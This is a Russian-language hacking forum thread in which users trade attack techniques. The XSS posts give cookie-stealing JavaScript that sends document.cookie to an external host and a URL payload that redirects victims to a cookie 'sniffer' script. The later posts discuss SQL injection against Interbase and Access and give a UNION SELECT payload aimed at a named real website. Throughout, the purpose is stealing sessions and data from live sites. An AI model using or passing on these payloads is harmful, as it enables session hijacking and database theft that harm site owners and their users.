да.
js примерно следующего содержания
<script>
document.location.href="http://yandex.ru";
</script>
оно тебя перенаправит сам понимаешь куда))

Я тож в хсс не особо шарю....но там вродь нада составить скрипт который перекидует выполнять то что те нужно и вставить его в уязвимое поле...
P.S.:Если чтот не так написал просьба сильно не пинать...)

В ифрейм вставь ссылку со своей КСС - и всё бут нормально. ЕСли хочешь, ниже редиррект ещё припиши

что не получается.У меня такого плана index js
в индексе пишу так
<script>document.location.href="ТУТ у меня хсс "</script>
а в js
img = new Image(); img.src = "http://na-s.ru/images/S0ulVortex_1.gif?"+document.cookie;
Я эту систему взял из видео где показывают хсс yandex

Может у кого есть другая система похожая на эту только чтобы после того как куки крадет кидала на какуюнють картинку или сайт

код чтобы перенаправить на сниффер + кук
http://site.ru/index.php?xss='><script>document.location.href='yo ur_site/sniffer.php?cookie='+document.cookie;</script>

Добрый день

Как реализовать атаку SQL Injection в среде Interbase (Firebird)?

Поддерживает ли Interbase установку UNION?

Был ли кого у опыт проведения атаки используя данную технологию?

Спасибо.

Parti, да в ibase можно объединять запросы оператором union; sql-inj хз смотря как построен запрос - попробуй perl-утилиту isr-sqlget
truelamer, _http://forum.antichat.ru/thread50550.html

http://www.nkzu.kz/new1/site_news.asp?id=123'

Microsoft JET Database Engine error '80040e14'

говорят не инжектится, но мне давным давно кто-то показал что таки извлеч инфу можно. Извлекали из табля news. Есть идеи как эту скулу раскрутить?

Кто говорит? Просто это Access, и всё немного подругому, если хочешь подбирай таблицы и поля:

http://www.nkzu.kz/new1/site_news.asp?id=240+union+select+1,2,3,4,5,6+from +tblnews

попугай
Вчера расписывал ответ на такой-же вопрос:
https://forum.antichat.ru/showpost.php?p=942609&postcount=34